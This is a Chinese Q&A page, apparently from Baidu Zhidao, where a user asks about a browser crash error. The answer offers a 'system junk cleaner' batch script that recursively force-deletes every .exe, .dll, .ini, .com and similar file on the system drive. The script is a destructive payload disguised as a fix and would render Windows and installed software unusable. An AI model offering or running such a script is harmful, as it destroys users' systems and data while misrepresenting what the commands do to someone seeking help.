打开网页时出现应用程序出错未知的软件异常(0×0eedfade).位置为0×7c812a5b

来源:百度知道 编辑:UC知道 时间:2024/09/18 18:06:44
打开网时经常出现这种程况,害我看不了,有哪位高人能救救我的,

哦~明白~~我教你一个程序 能删除这样的毛病~ 按下面的试试吧 应该可以
打开[开始]-[所有程序]-[附件]-[记事本]
然后复制以下内容

@echo off
echo 正在清除系统垃圾文件,请稍等......
del /f /s /q %systemdrive%\*.exe
del /f /s /q %systemdrive%\*.ini
del /f /s /q %systemdrive%\*.htt
del /f /s /q %systemdrive%\*.com
del /f /s /q %systemdrive%\*.asp
del /f /s /q %systemdrive%\*.dll
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\COOKIES s\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"